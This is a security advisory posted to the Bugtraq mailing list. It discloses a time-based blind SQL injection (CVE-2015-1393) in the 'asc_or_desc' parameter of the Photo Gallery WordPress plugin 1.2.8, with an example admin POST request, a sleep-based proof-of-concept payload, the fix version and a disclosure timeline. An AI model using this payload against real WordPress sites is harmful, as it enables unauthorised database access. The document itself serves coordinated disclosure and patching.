Bugtraq mailing list archives

[CVE-2015-1393] Photo Gallery (Wordpress Plugin) - SQL Injection in Version 1.2.8


From: sven () bsddaemon org
Date: Wed, 28 Jan 2015 04:50:47 GMT

[CVE-2015-1393] Photo Gallery (Wordpress Plugin) - SQL Injection in Version 1.2.8

----------------------------------------------------------------

Product Information:

Software: Photo Gallery (Wordpress Plugin)
Tested Version: 1.2.8, released on 15.01.2015 and has over half a million downloads.
Vulnerability Type: SQL Injection (CWE-89)
Download link to tested version: https://downloads.wordpress.org/plugin/photo-gallery.1.2.8.zip 
Description: Photo Gallery is an advanced plugin with a list of tools and options for adding and editing images for 
different views. It is fully responsive. The product includes plugin for adding image galleries and albums to posts and 
pages, as well as multiple widgets. You can add images, providing detailed descriptions and tags, organize the 
galleries into different albums. (copied from https://wordpress.org/plugins/photo-gallery/)

----------------------------------------------------------------

Vulnerability description:

When an authenticated user is creating a new gallery a POST-request is sent to the application that is prone to 
SQL-Injection in the parameter "asc_or_desc".


POST /wordpress/wp-admin/admin.php?page=galleries_bwg HTTP/1.1
Host: <IP>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: <Wordpress-Cookie>
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 150

search_value=&page_number=1&search_or_not=&task=add&current_id=&ids_string=&asc_or_desc=asc&order_by=order


The parameter asc_or_desc in the POST body is prone to a AND/OR time-based blind SQL-Injection. WIth the following 
payload a delay can be provoked in the request of additional 10 seconds:

asc_or_desc=asc%2c(select%20*%20from%20(select(sleep(10)))a)


----------------------------------------------------------------

Impact: 

Direct database access will be possible if an attacker is exploiting the SQL Injection vulnerability.

----------------------------------------------------------------

Solution:

Update to the latest version, which is  1.2.11, see https://wordpress.org/plugins/photo-gallery/.

----------------------------------------------------------------

Timeline:

Vulnerability found: 20.01.2015
Vendor informed: 21.01.2015
Response by vendor: 23.01.2015
Fix by vendor 25.01.2015
Public Advisory: 28.01.2015

----------------------------------------------------------------

Regards,

Sven Schleier


Current thread: